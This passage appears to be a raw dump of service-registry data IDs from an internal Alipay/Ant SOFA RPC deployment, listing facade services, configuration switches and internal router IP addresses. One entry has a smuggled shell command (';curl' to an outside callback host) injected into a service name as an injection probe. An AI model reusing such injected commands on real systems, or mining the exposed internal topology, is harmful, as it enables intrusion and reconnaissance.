lipay.sofa.rpc.elastic.ElasticService:1.0:insautoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTRUMENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:alb_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.BizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:opencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.zmtrans.api.ZmtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fintradeguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.kmi.LeadsCryptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.signature.SignatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.AcctransAccountFreezeLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchstoreapp.common.service.store.external.facade.asset.StoreAssetQueryExternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservicesinspect.biz.shared.inspect.service.InspectTaskResultQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.login.DeleteLoginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:apsasmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.EmpowermentTrainingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:certify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.mobile.api.ContentQueryMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.184.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ismartx.common.service.facade.api.KybService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecsa.common.service.facade.mutualtask.MutualtaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkibdeposit.common.service.facade.query.InstHistoryBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.zcb.facade.appointment.service.AppointmentCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundselling.share.partner.InstCapitalConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finopencore.common.service.content.facade.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileappcommon.common.service.facade.baas.DynamicTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.DataContextDrmResource.publicWithholdGrantPassThroughSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.sofa.runtime.drm.log4j2LevelDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.PrePromoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdOrganizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.meta.MetaUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.deductSuccess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.test.SimpleService-31#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.certify.service.facade.OpenCertifyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.biz.service.impl.manage.RocksCacheManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.sales.AppointmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:snbdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferSaleUnitManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.buservice:name=com.alipay.zcache.tbase.DynamicConfigTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileorderprod.service.api.mng.SysConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:staticrescore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PasswordVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_COMM_MESSAGE_SENDER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.pcald.common.service.facade.LoanRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.176.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.mobileprod.common.service.facade.f2fpay.F2fPayTickSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentLimitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:openmonitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ai.AIBillRemindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.manager.NodeMeterPushManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.open.CouponContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.business.RecruitApplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.modelcenter.common.service.facade.CtuModelAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.MerchantSubjectQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.tbase.bankcardTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityprod.common.service.facade.promotion.SecurityprodRecommendService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","sdaota@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.transfercenter.common.service.facade.api.TransferConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AGDSCSALIPAY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.backend.service.facade.groupdef.GroupDefServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iaassettrans.facade.fabs.api.consult.AccountingConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almanalysis.common.service.facade.api.FundChainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingFileManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.aralert.ArAlertFeedbackQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:loadcentercloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;curl http://MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDI0.ssrf.noble.log.lynnshare.cc;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.SpiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finannafccore.common.service.facade.card.api.TeachCardMaintenanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.abos.AbosEnterpriseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm7015#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.membertangram.common.service.facade.jigsaw.JigsawActivityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.StdInformOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.mng.facade.MypassDemoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.YebcRedPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.TfrEmergencyMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.EbppLeadsExpandInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue17#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscharityprod.common.service.facade.PolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.biz.service.impl.resource.testcase.TestCaseSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.DeployProgressManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.lmyh.LmyhInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.indicator.IndicatorRuleScriptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:ifinflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.98.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.4.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mfinquotationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.AntProcessServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_DEPOSIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsandbox.service.facade.autopress.PressTestPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.link.LinkConfigUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.StagedPaymentService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.msg.MsgManagerFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_UIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfcif.facade.agreement.AgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.165.169.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbschedules.common.serivce.facade.ScheduleSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:watcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_SUPE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antcloud.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmng.service.facade.ctrl.identifyTag.BizIdentifyQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.233.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmatchcore.common.service.facade.client.sofamq.MatchedRecordProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxStockFileSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.open.offer.OfferSaleQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:bkdchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.CodecRouteDecisionFacade:1.0:cateCodecRouteDecisionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unifygw.facade.service.UnifygwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.185.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.support.isc.IscStabilityScoreRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.order.FaOrderAssetTransApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.TableInstanceCalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.PayAuthManageCallBackService:1.0:yebsas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.189.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financemng.biz.shared.allocation.AstAllocInstElementManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.generalorder.operation.OrderOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.StdInformConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ProviderManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.common.shared.facade.ConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ipromofront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:archimedes@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:metadatacenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ropcn.common.service.facade.api.cscheck.CsCheckTaskOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.fsc.facade.ConditionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbcraftsman@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.TaskManagerFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:tfapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.sales.SalesComplaintFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insclaimdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.218.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.acsellcore.common.service.facade.OperateLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.FinDataOperatService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:smartsqlocb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-gotonemng-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imemberprod.service.facade.api.MessageRelayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCJieBeiOnlineApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.CheckFileManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpcmc.orderpool.credit.OrderCreditQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_FUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.24.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.145.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.assetflux.service.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.familycore.facade.FamilyContractActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.PostFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdscsalipay.common.service.facade.cache.DrawndnMonitorFacadeProxy:1.0:drawndnMonitorFacadeProxyTrService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_APP2#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.ProcessBillStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","ctutask.domain.server#@#DEFAULT_INSTANCE_ID#@#ctu.server.group","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.service.tenant.CapNamespaceService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","mwealthprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agap.service.facade.mng.api.ComponentTemplateMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mservice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopRepeatLicenseValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.AssetTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:mct_tmp_apply_mail_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.proxy.BuserviceProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.mapitool.facade.ProxyPartnerExterfaceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.StampAutoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:publiccore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2PriceByVolumeSnapshotFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkebank_bpayOpenConfigProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxlib.common.shared.facade.spi.InternalRemoteHoloxCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.sign.MerchantSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_settlementService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.listen.CfpAccountSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rcsmart.facade.schedule.RcSmartScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestEnableSample,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.almcenter.service.facade.api.fundredeem.FundRedeemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.system.OssServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.15.248.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zconsole.msgbrokerapply.subscription.SubscriptionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.barrier.ChangeBarrierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata3.schedule.rpc.service.ops.FieldInstanceResumeService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.face.service.FaceDataRepositoryGzoneService:1.0:zhubasyn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.iot.bpaas.ServiceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trisktcc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerforum.service.Credit:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.porder.common.service.api.task.PorderTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthfront.service.facade.PcreditGuaranteeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.BbcTableConverageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.bp.engine.service.BPJobService:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:karasbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.loadOffline,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.useOldSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.19.38.41#@#DEFAULT_INSTAN